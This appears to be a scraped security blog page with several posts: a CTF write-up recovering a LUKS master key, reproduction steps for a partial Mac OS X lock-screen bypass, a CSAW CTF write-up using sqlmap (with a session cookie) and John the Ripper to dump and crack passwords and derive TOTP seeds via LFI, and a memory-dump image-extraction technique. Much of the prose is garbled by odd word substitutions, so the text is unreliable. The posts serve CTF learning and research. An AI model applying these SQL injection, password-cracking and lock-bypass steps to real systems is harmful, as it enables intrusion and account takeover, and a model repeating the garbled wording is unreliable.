/></a></div><br />The Master Key (MK) has 128 bits, which is a good sign. The payload offset is 2048 and we need to do some vital math here to get the LUKS header size: 2048 * 512 / 1024 = 1024 (fdisk -l shows that the cluster size is 512 bytes).<br /><br />We now proceed to write a new LUKS header on the device using the extracted MK, assigning a new passphrase:<br /><br /><div class="code">dd if=/dev/vg/home of=test.img<br />hexdump -C -n 80 test.img<br />dd if=/dev/zero of=test.img conv=notrunc bs=1024 count=1<br />hexdump -C -v -n 80 test.img<br />echo 1fab015c1e3df9eac8728f65d3d16646 | xxd -r -p &gt; key.bin</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-ueeK2gMcQcA/Vihn5E77S1I/AAAAAAAABN4/t-Nhy3K8nUA/s1600/Screenshot-Terminal-3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="272" src="http://2.bp.blogspot.com/-ueeK2gMcQcA/Vihn5E77S1I/AAAAAAAABN4/t-Nhy3K8nUA/s400/Screenshot-Terminal-3.png" width="400" /></a></div><br /><div class="code">cryptsetup luksFormat --verify-passphrase --cipher=aes-ecb --hash=sha1 --key-size=128 --master-key-file=key.bin test.img</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-751GFVP6PSg/VihoTIv4wwI/AAAAAAAABOA/mptXY4WDEf4/s1600/Screenshot-Terminal-4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="135" src="http://1.bp.blogspot.com/-751GFVP6PSg/VihoTIv4wwI/AAAAAAAABOA/mptXY4WDEf4/s400/Screenshot-Terminal-4.png" width="400" /></a></div><br />They tried to hibernate the flag from "/bin/cat" using the transport return char (0x0D), but hexdump and Pluma had no problems displaying it:<br /><br /><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: left;">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<a href="http://4.bp.blogspot.com/-6YhHccbV4Mc/VihpS_TteEI/AAAAAAAABOU/Txdc9fMQ-tg/s1600/final.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="352" src="http://4.bp.blogspot.com/-6YhHccbV4Mc/VihpS_TteEI/AAAAAAAABOU/Txdc9fMQ-tg/s400/final.png" width="400" /></a></div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: center;">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<a href="http://3.bp.blogspot.com/-5TSWYFfQZrs/VihoaLEn2nI/AAAAAAAABOM/bJLexLLGoVc/s1600/Screenshot-Terminal-5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="144" src="http://3.bp.blogspot.com/-5TSWYFfQZrs/VihoaLEn2nI/AAAAAAAABOM/bJLexLLGoVc/s400/Screenshot-Terminal-5.png" width="400" /></a></div><br /><br />Flag:&nbsp;<b>flag{v0t3_f0r_p3dr0}</b><br /><b><br /></b><b><br /></b><b>Update 1:&nbsp;</b><a href="https://twitter.com/rbaranyi">@rbaranyi</a> and <a href="https://plus.google.com/107016163963660206221">David Berard</a> pointed out that replacing '/etc/shadow', login with the known password and then use 'strings /dev/lvm' would be easier. That's true, but that wouldn't involve any kind of <a href="http://cdn.meme.am/instances/500x/65198356.jpg">memory inception</a>.<br /><br /><b>Update 2:&nbsp;</b><a href="https://plus.google.com/107016163963660206221">David Berard</a>&nbsp;pointed out that <a href="https://gitlab.com/cryptsetup/cryptsetup/wikis/FrequentlyAskedQuestions#6-backup-and-data-recovery">newer 'cryptsetup' offers an option to set a new passphrase using the master key</a>: 'cryptsetup luksAddKey --master-key-file=&lt;master-key-file&gt; &lt;luks device&gt;'<br /><br /><b>Update 3:</b>Equalto the <a href="https://github.com/xwings/tuya/tree/master/ctf2015/hack.lu/drbob150">writeup from CLGT</a>, you can moreover dump &nbsp;VirtualBox RAM using this legalistic command: 'VBoxManage debugvm SafeClone dumpvmcore --filename=getthekey'<br /><br /><b>Update 4:</b> Some teams used the <a href="https://github.com/c1fe/dm_dump/">dm_dump</a> volatility plugin: it identifies disks on the target system which were mounted using the device-mapper framework.&nbsp;The output of this plugin gives you the arguments to pass to the dmsetup writ to remount the original unencrypted file system on a variegated machine.<br /><br />Bernardo Rodrigueshttp://www.blogger.com/profile/09470949514402700579noreply@blogger.com4tag:blogger.com,1999:blog-3296471108082693838.post-14134944204402547312015-10-07T11:18:00.001-03:002015-10-07T11:26:14.058-03:00Mac OS X 10.11 Partial Lock Screen BypassLock screen bypasses are rhadamanthine mainstream. The most notable recent bypasses are&nbsp;<a href="https://bugs.launchpad.net/ubuntu/+source/unity/+bug/1308572">the one from Ubuntu 14.04</a>&nbsp;(hold enter, lock screen crashes, computer unlocked) and&nbsp;<a href="http://sites.utexas.edu/iso/2015/09/15/android-5-lockscreen-bypass/">the one from Android 5.x</a>&nbsp;(input large strings in the password field, destabilize the lock screen, crash to the home screen).<br /><br />Many respected researcher had found and published something well-nigh this matriculation of bugs and this blog is no different: this post describes a <strike>completely useless</strike> <a href="https://www.youtube.com/watch?v=h05YfP_8UsU">super serious</a>&nbsp;vulnerability well-expressed Mac OS X 10.11 and earlier.<br /><br /><b>Mac OS X 10.11 Partial Lock Screen Bypass</b><br /><br />Mac OS X 10.11 (and probably older versions) are vulnerable to a partial lock screen bypass. This is not a *complete* lock screen shirk as you won't be worldly-wise to freely interact with the Desktop (as far as I know). Here are the steps to reproduce this bug:<br /><br />1 - Hit the&nbsp;<b>Exposé Key (F3)</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-PfrZ39PtqXc/VhSsJVr0aWI/AAAAAAAABKE/l20PkwPbtJc/s1600/Screen%2BShot%2B2015-10-07%2Bat%2B1.43.38%2BAM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://2.bp.blogspot.com/-PfrZ39PtqXc/VhSsJVr0aWI/AAAAAAAABKE/l20PkwPbtJc/s400/Screen%2BShot%2B2015-10-07%2Bat%2B1.43.38%2BAM.png" width="400" /></a></div><br /><br />2 - Click on any window and alimony holding it<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-yFiDdnA7yoI/VhSsQxPJ6TI/AAAAAAAABKM/A7pxznJbmXA/s1600/Screen%2BShot%2B2015-10-07%2Bat%2B1.43.56%2BAM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://3.bp.blogspot.com/-yFiDdnA7yoI/VhSsQxPJ6TI/AAAAAAAABKM/A7pxznJbmXA/s400/Screen%2BShot%2B2015-10-07%2Bat%2B1.43.56%2BAM.png" width="400" /></a></div><br /><br />3 -Alimonyholding the left mouse sawed-off and lock the screen using <b>Command + Option + Eject </b>(hold all these keys together for some time)<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-pMmsIbsTS2A/VhSsZjNjOkI/AAAAAAAABKU/duYxcRsqC7c/s1600/Screen%2BShot%2B2015-10-07%2Bat%2B1.48.54%2BAM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="223" src="http://3.bp.blogspot.com/-pMmsIbsTS2A/VhSsZjNjOkI/AAAAAAAABKU/duYxcRsqC7c/s400/Screen%2BShot%2B2015-10-07%2Bat%2B1.48.54%2BAM.png" width="400" /></a></div><br /><br />That's it, now the lock screen has an "extra layer" with the miniaturised desktop windows. If you move the mouse cursor over the correct using position and hit the <b>Space Key</b>, a worthier window will be displayed.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/--W3j0d0gQGA/VhSskspDXKI/AAAAAAAABKc/xoyP-D_5d30/s1600/Screen%2BShot%2B2015-10-07%2Bat%2B2.08.54%2BAM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="172" src="http://1.bp.blogspot.com/--W3j0d0gQGA/VhSskspDXKI/AAAAAAAABKc/xoyP-D_5d30/s320/Screen%2BShot%2B2015-10-07%2Bat%2B2.08.54%2BAM.png" width="320" /></a></div><br /><br />You can watch Youtube videos and interact with media players (Quicktime, Spotify etc) using the media tenancy keys. You can't interact directly with the app: if you left-click on the windows or hit Enter, the lock screen takes over that invisible layer.<br /><br />Proof-of-concept - Mac OS X 10.11:<br /><br /><div class="separator" style="clear: both; text-align: center;"><iframe allowfullscreen="" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/lDkJ0XtIrxk/0.jpg" frameborder="0" height="266" src="https://www.youtube.com/embed/lDkJ0XtIrxk?feature=player_embedded" width="320"></iframe></div><br />If Youtube is blocking the video in your country, watch it here:<br /><br /><div class="separator" style="clear: both; text-align: center;"><iframe allowfullscreen="" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/yQ8SYyP4-Uw/0.jpg" frameborder="0" height="266" src="https://www.youtube.com/embed/yQ8SYyP4-Uw?feature=player_embedded" width="320"></iframe></div><br /><br />If you are a serious tech journalist reporting well-nigh this&nbsp;<strike>bug</strike>&nbsp;feature, don't forget to say that this is specially useful to play Youtube and Spotify playlists during parties at a friend's house. You don't want to leave you Mac logged in and unattended, so you simply preload the playlist and lock the screen using this tomfool technique.<br /><br /><br /><b>Bonus: Mac OS X 10.11SubconsciousWindow Bug</b><br /><br />This is yet flipside <strike>useless</strike>&nbsp;<a href="https://www.youtube.com/watch?v=nGf3PdZviXk">totally serious</a>&nbsp;bug well-expressed the new Mac OS X El Capitain. You can hibernate an using window from the user by moving them to flipside exhibit and successive the screen mirroring options. Here are the steps to reproduce this bug:<br /><br />1 - Connect your monitor to an external exhibit ("Use As Separate Display")<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-5A5w8nW6EOo/VhSpbspgtdI/AAAAAAAABJw/ankGX_NvYPM/s1600/Screen%2BShot%2B2015-10-07%2Bat%2B2.10.37%2BAM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="189" src="http://1.bp.blogspot.com/-5A5w8nW6EOo/VhSpbspgtdI/AAAAAAAABJw/ankGX_NvYPM/s320/Screen%2BShot%2B2015-10-07%2Bat%2B2.10.37%2BAM.png" width="320" /></a></div><br />2 - Move the window you want to hibernate to the secondary display<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-GNKxBAqxIZM/VhStBTstZiI/AAAAAAAABKk/ALshRQhz1Eg/s1600/Screen%2BShot%2B2015-10-07%2Bat%2B2.25.33%2BAM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="261" src="http://4.bp.blogspot.com/-GNKxBAqxIZM/VhStBTstZiI/AAAAAAAABKk/ALshRQhz1Eg/s400/Screen%2BShot%2B2015-10-07%2Bat%2B2.25.33%2BAM.png" width="400" /></a></div>3 - Hit the&nbsp;<b>Exposé Key (F3)</b>, move the mouse cursor over the window you want to hibernate and hit the <b>Space Key</b>.<br /><br />4 - Alternate the screen mirroring options by inputting <b>Command + F1</b><br /><br />5 - The window is gone (OMGBBQ!!!)<br /><br />Proof-of-concept - Mac OS X 10.11:<br /><div><br /></div><div><div class="separator" style="clear: both; text-align: center;"><iframe allowfullscreen="" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/g5RmxeP_2dk/0.jpg" frameborder="0" height="266" src="https://www.youtube.com/embed/g5RmxeP_2dk?feature=player_embedded" width="320"></iframe></div><br /></div><div><br /></div><div>I personally use this to hibernate all the Mac applications from coworkers who leave their computers unlocked and unattended.</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-40i0o23GCCA/VhSsCw72zdI/AAAAAAAABJ8/A786bJd4JGE/s1600/evilest.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="232" src="http://3.bp.blogspot.com/-40i0o23GCCA/VhSsCw72zdI/AAAAAAAABJ8/A786bJd4JGE/s320/evilest.gif" width="320" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div>Bernardo Rodrigueshttp://www.blogger.com/profile/09470949514402700579noreply@blogger.com1tag:blogger.com,1999:blog-3296471108082693838.post-74438714465523387022015-09-20T19:30:00.001-03:002015-09-21T20:34:10.482-03:00CSAW CTF 2015 Write Up: Weebdate (web500)The anual CSAW CTF Qualification Round took place on September 18-20 and it was yet flipside really tomfool CTF. I played with my friends from TheGoonies and we ranked #128 overall (<a href="https://www.youtube.com/watch?v=hM5cj8OZZhk">The Goonies 'R' Good Enough</a>).<br /><br /><b>Task - Weebdate (web500)</b><br /><br /><div class="code">Since the Ashley Madison hack, a lot of upper profile socialites have scrambled to find the hottest new dating sites. Unfortunately for us, that ways they're taking increasingly safety measures and only using secure websites. We have some suspicions that Donald Trump is using a new dating site tabbed "weebdate" and moreover selling cocaine to fund his presidential campaign. We need you to get both his password and his 2 factor TOTP key so we can unravel into his profile and investigate.<br /><br />Flag is md5($totpkey.$password)<br /><br />http://54.210.118.179/</div><br />This is a vital Flask using running a dating site. The website has some features like most web applications we are used to: creating users, editing profiles, sending messages, searching users and <a href="https://en.wikipedia.org/wiki/Ashley_Madison_data_breach">exposing the whole consumer data</a> thourgh SQL Injection and LFI.<br /><br /><b>SQLi</b><br /><br />The CSP reporting URI was vulnerable to SQL injection. SQLmap had no problems finding and exploiting it.<br /><br /><div class="code">python sqlmap.py -u 'http://54.210.118.179:80/csp/view/1' --cookie='session=donaldtrump010_1442717300_f65cb746b519c2b49f8e938a896e08e96f5fc533' --dbms=mysql --batch </div><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-n9__Gn783YI/Vf8oW0d4ieI/AAAAAAAABHw/xCeY0SGFvjM/s1600/sqli.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="http://4.bp.blogspot.com/-n9__Gn783YI/Vf8oW0d4ieI/AAAAAAAABHw/xCeY0SGFvjM/s640/sqli.png" width="532" /></a></div>The 'weeb' database had three tables: messages, reports and users. The 'user' table had eight columns:&nbsp;user_id, user_name,&nbsp;user_password,&nbsp;user_ip,&nbsp;user_image,&nbsp;user_credits,<br />user_register_time and user_profile.<br /><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-Cx6cZV0d6Zw/Vf8lD7Jw4xI/AAAAAAAABHo/5nwP345j4Po/s1600/Capturar.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="281" src="http://1.bp.blogspot.com/-Cx6cZV0d6Zw/Vf8lD7Jw4xI/AAAAAAAABHo/5nwP345j4Po/s640/Capturar.PNG" width="640" /></a></div><br /><br />Passwords had a SHA256 pattern so I quickly started cracking them using John The Ripper:<br /><br /><div class="code">john --format=raw-sha256 hash.txt --wordlist=rockyou.txt</div><br />Most croaky passwords had patterns like 'testtest', 'lablab' and 'guest1guest1'.Withoutsome time I realised that the username was used as a <a href="https://en.wikipedia.org/wiki/Salt_(cryptography)">Salt</a>. I generated a small wordlist concatenating donaldtrump's user and password and I finally managed to one-liner it:<br /><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-kHyegy2HaAE/Vf8lD3YA6II/AAAAAAAABHk/vnUTQIWU-Vg/s1600/crack.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="502" src="http://4.bp.blogspot.com/-kHyegy2HaAE/Vf8lD3YA6II/AAAAAAAABHk/vnUTQIWU-Vg/s640/crack.PNG" width="640" /></a></div><br /><br />The login form displays "Invalid verification code" when you type a wrong TOTP verification lawmaking and it returns "Invalid credentials" when you mistype the password. I knew that his password was 'zebra' but I still needed to find out the TOTP algorithm in order to steal his seed.<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-JNjY4kVD6M4/Vf8qmEIYiwI/AAAAAAAABH8/DjSyk6doWJU/s1600/Screen%2BShot%2B2015-09-20%2Bat%2B6.55.41%2BPM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="515" src="http://3.bp.blogspot.com/-JNjY4kVD6M4/Vf8qmEIYiwI/AAAAAAAABH8/DjSyk6doWJU/s640/Screen%2BShot%2B2015-09-20%2Bat%2B6.55.41%2BPM.png" width="640" /></a></div><b>LFI</b><br /><br />The 'image_url' parameter from '/profile/edit' was vulnerable to LFI, displaying the full content from local files:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-_F10tupD13U/Vf8s3Cjd-iI/AAAAAAAABII/Wv5EibmGdqY/s1600/Screen%2BShot%2B2015-09-20%2Bat%2B7.01.16%2BPM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="280" src="http://4.bp.blogspot.com/-_F10tupD13U/Vf8s3Cjd-iI/AAAAAAAABII/Wv5EibmGdqY/s640/Screen%2BShot%2B2015-09-20%2Bat%2B7.01.16%2BPM.png" width="640" /></a></div><br /><br />A curious note here is that it was the first time I managed to find a bug using <a href="https://portswigger.net/burp/help/collaborator.html">Burp Collaborator</a>. The scanner identified the external HTTP/DNS interaction and without some digging I quickly found the LFI =)<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-Qefn9fh3TM8/Vf8zB4kXbEI/AAAAAAAABJQ/lWtpBiAMlOo/s1600/collab.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="468" src="http://1.bp.blogspot.com/-Qefn9fh3TM8/Vf8zB4kXbEI/AAAAAAAABJQ/lWtpBiAMlOo/s640/collab.png" width="640" /></a></div>After <strike>some</strike> a lot of time bruteforcing the dirs and files, we managed to find the server root:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-EGASeOZTSF8/Vf8tOfxQ8OI/AAAAAAAABIQ/1Bajj00Q5XY/s1600/brute.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="488" src="http://1.bp.blogspot.com/-EGASeOZTSF8/Vf8tOfxQ8OI/AAAAAAAABIQ/1Bajj00Q5XY/s640/brute.png" width="640" /></a></div>We are particularly interested on the&nbsp;generate_seed() function:<br /><br />- <u>server.py</u><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-gd63Mz5pZ-w/Vf8uANA-p2I/AAAAAAAABIc/PTUe7Nf00Bg/s1600/Screen%2BShot%2B2015-09-20%2Bat%2B7.10.00%2BPM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="496" src="http://4.bp.blogspot.com/-gd63Mz5pZ-w/Vf8uANA-p2I/AAAAAAAABIc/PTUe7Nf00Bg/s640/Screen%2BShot%2B2015-09-20%2Bat%2B7.10.00%2BPM.png" width="640" /></a></div><br />- <u>utils.py</u><br /><div class="separator" style="clear: both; text-align: center;"></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-G6cAaCSXJlk/Vf8uIeJd0JI/AAAAAAAABIs/u07y1OMAr0E/s1600/Screen%2BShot%2B2015-09-20%2Bat%2B7.09.16%2BPM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="160" src="http://3.bp.blogspot.com/-G6cAaCSXJlk/Vf8uIeJd0JI/AAAAAAAABIs/u07y1OMAr0E/s640/Screen%2BShot%2B2015-09-20%2Bat%2B7.09.16%2BPM.png" width="640" /></a></div><br />The TOTP is not stored server-side: it is generated at runtime using a seed based on the username and his registration IP Address. We had the user IP write from the SQLi dump and we can now use the get_otp_key() function to generate his TOTP key:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-sze_t8r0xQc/Vf8vgjL60RI/AAAAAAAABI4/UirAPhMHs_w/s1600/Screen%2BShot%2B2015-09-20%2Bat%2B7.17.49%2BPM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="528" src="http://4.bp.blogspot.com/-sze_t8r0xQc/Vf8vgjL60RI/AAAAAAAABI4/UirAPhMHs_w/s640/Screen%2BShot%2B2015-09-20%2Bat%2B7.17.49%2BPM.png" width="640" /></a></div>The flag is the md5($totpkey.$password):&nbsp;<b style="text-align: center;">a8815ecd3c2b6d8e2e884e5eb6916900</b><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-mnBWI9GAYL8/Vf8w_cDQaSI/AAAAAAAABJE/x3vrq9B4f4A/s1600/Screen%2BShot%2B2015-09-20%2Bat%2B7.24.03%2BPM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="188" src="http://4.bp.blogspot.com/-mnBWI9GAYL8/Vf8w_cDQaSI/AAAAAAAABJE/x3vrq9B4f4A/s640/Screen%2BShot%2B2015-09-20%2Bat%2B7.24.03%2BPM.png" width="640" /></a></div>Bernardo Rodrigueshttp://www.blogger.com/profile/09470949514402700579noreply@blogger.com1tag:blogger.com,1999:blog-3296471108082693838.post-5954158730381861442015-02-26T11:11:00.001-03:002015-02-27T00:56:54.499-03:00Extracting RAW pictures from memory dumps<b>Introduction</b><br /><br />Earlier today, while reading my Twitter timeline, I saw some Infosec folks discussing well-nigh scripts/tools to identify RAW pictures in memory dumps. I decided, then, to write this blog post and share a small hack that I use to visualize data (including memory dumps).<br /><span style="text-align: center;"><br /></span><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://twitter.com/angealbertini/status/570495262474416130"><img border="0" src="http://2.bp.blogspot.com/-GWwCuw__A6I/VO8l4Wj2kJI/AAAAAAAAA_U/lusMMXroRmc/s1600/ange.PNG" height="217" width="400" /></a></div><span style="text-align: center;"><br /></span><span style="text-align: center;"><br /></span><span style="text-align: center;">A few months ago, I wrote a post detailing how to&nbsp;</span><a href="http://w00tsec.blogspot.com/2014/08/scan-internet-screenshot-all-things.html" style="text-align: center;">Scan the Internet &amp; Screenshot All the Things</a><span style="text-align: center;">, now it's time to Dump the Memory &amp; Screenshot All the Things.</span><br /><b style="text-align: center;"><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-6qB7pZYQm4c/VO7AgdTMMLI/AAAAAAAAA8c/LIeAiiNvtKQ/s1600/memfor.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-6qB7pZYQm4c/VO7AgdTMMLI/AAAAAAAAA8c/LIeAiiNvtKQ/s1600/memfor.jpg" height="239" width="320" /></a></div><b style="text-align: center;"><br /></b><b style="text-align: center;"><br /></b><b style="text-align: center;">Memory Dumps</b><br /><br />The first thing you will want to do is to narrow the wringer to the process containing interesting images/pictures. I'm going to use three variegated memory dumps here:<br /><br /><b>Remote DesktopVendee- Windows 7 x64 (mstsc.exe)</b><br /><br />Let's use the Windows seated RDP vendee to connect to an external server and dump the process<br />memory using <a href="https://technet.microsoft.com/en-us/sysinternals/dd996900.aspx">procdump</a>:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-JXAYtT2d_bk/VO7JPDqZaSI/AAAAAAAAA9A/JHAg-jy6h-4/s1600/rdp1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-JXAYtT2d_bk/VO7JPDqZaSI/AAAAAAAAA9A/JHAg-jy6h-4/s1600/rdp1.PNG" height="240" width="320" /></a></div><br /><div class="code">procdump.exe -ma mstsc.exe mstsc.dmp</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-kx_4kRmKA4o/VO7JTIGz-iI/AAAAAAAAA9I/6ZyUF55aS48/s1600/rdp2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-kx_4kRmKA4o/VO7JTIGz-iI/AAAAAAAAA9I/6ZyUF55aS48/s1600/rdp2.PNG" height="201" width="400" /></a></div><br /><br /><b>Microsoft Paint - Windows 7 x64 (mspaint.exe)</b><br /><ul></ul><br />Let's load/save a simple image file on Paint and run procdump again:<br /><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-XXLe962Bpy4/VO7Jo25GYSI/AAAAAAAAA9Q/8eRzevEJnYk/s1600/paint1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-XXLe962Bpy4/VO7Jo25GYSI/AAAAAAAAA9Q/8eRzevEJnYk/s1600/paint1.PNG" height="280" width="320" /></a></div><br /><div class="code">procdump.exe -ma mspaint.exe mspaint.dmp</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-YskZ3ppgNrs/VO7JyfX8B3I/AAAAAAAAA9Y/Z00sGC0aMo8/s1600/mspaint2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-YskZ3ppgNrs/VO7JyfX8B3I/AAAAAAAAA9Y/Z00sGC0aMo8/s1600/mspaint2.PNG" height="201" width="400" /></a></div><br /><br /><b>9447 2014 CTF Challenge: coor coor - Windows XP (VirtualBox.exe)</b><br /><ul></ul><div>There's an <a href="https://twitter.com/jstnkndy/status/541104077086928898">awesome write-up</a> for this CTF rencontre <a href="http://w00tsec.blogspot.com/2014/11/9447-2014-ctf-write-up-coor-coor.html">here</a>, go read it now if you haven't yet. We are going to use volatility to isolate the VirtualBox memory dump:</div><div><br /></div><div><div class="code">python vol.py -f challenge.vmem pslist</div></div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-dn8guyuCORI/VO7EKuzeaZI/AAAAAAAAA8o/Rq9gXAcdBUM/s1600/001.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-dn8guyuCORI/VO7EKuzeaZI/AAAAAAAAA8o/Rq9gXAcdBUM/s1600/001.png" height="268" width="400" /></a></div><br /><div class="code">python vol.py -f challenge.vmem memdump -p 1568 --dump-dir=dump/</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-bqv6UPf1e_c/VO7ENjnC4cI/AAAAAAAAA8w/IFQsDegYTGc/s1600/002.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-bqv6UPf1e_c/VO7ENjnC4cI/AAAAAAAAA8w/IFQsDegYTGc/s1600/002.png" height="78" width="400" /></a></div><br /><br /><b>RAW Image Data</b><br /><br />Rename the file extensions from *.dmp to *.data, download/install&nbsp;<a href="http://www.gimp.org/">GIMP</a>&nbsp;and unshut them as "RAW Image Data":<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-vsOql0K-FGQ/VO7MG2EC5rI/AAAAAAAAA9k/DwMIcS5ZulQ/s1600/gimp1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-vsOql0K-FGQ/VO7MG2EC5rI/AAAAAAAAA9k/DwMIcS5ZulQ/s1600/gimp1.png" height="201" width="320" /></a></div><br />That's it, now you can use GIMP to navigate within the memory dump and analyse the rendered pixels/bitmaps on their respective offsets. It's worth mentioning that variegated images will be rendered using variegated Image types and variable widths: you may need to retread these values accordingly.<br /><br />So what can we spot here?<br /><br /><ul><li>On the RDP memory dump, we can retrieve the tiles and Windows displayed during the connection, including IP's, usernames and commands:</li></ul><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://3.bp.blogspot.com/-GMXIXeu74wE/VO7OhJbOekI/AAAAAAAAA-A/Cw8TvH60rpI/s1600/Screenshot-Load%2BImage%2Bfrom%2BRaw%2BData-2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="http://3.bp.blogspot.com/-GMXIXeu74wE/VO7OhJbOekI/AAAAAAAAA-A/Cw8TvH60rpI/s1600/Screenshot-Load%2BImage%2Bfrom%2BRaw%2BData-2.png" height="320" width="306" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Windows commands</td></tr></tbody></table><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://4.bp.blogspot.com/-NlypQNpsDPQ/VO7OaJhhF2I/AAAAAAAAA94/s7xotse3pXM/s1600/Screenshot-Load%2BImage%2Bfrom%2BRaw%2BData-1.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="http://4.bp.blogspot.com/-NlypQNpsDPQ/VO7OaJhhF2I/AAAAAAAAA94/s7xotse3pXM/s1600/Screenshot-Load%2BImage%2Bfrom%2BRaw%2BData-1.png" height="320" width="306" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Remote DesktopVendeeWindow</td></tr></tbody></table><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://3.bp.blogspot.com/-g80XGtUTVxo/VO7OUfM528I/AAAAAAAAA9w/9x4lrINv2kg/s1600/Screenshot-Load%2BImage%2Bfrom%2BRaw%2BData.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="http://3.bp.blogspot.com/-g80XGtUTVxo/VO7OUfM528I/AAAAAAAAA9w/9x4lrINv2kg/s1600/Screenshot-Load%2BImage%2Bfrom%2BRaw%2BData.png" height="320" width="306" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">RDP session</td></tr></tbody></table><div><ul><li>The Microsoft Paint 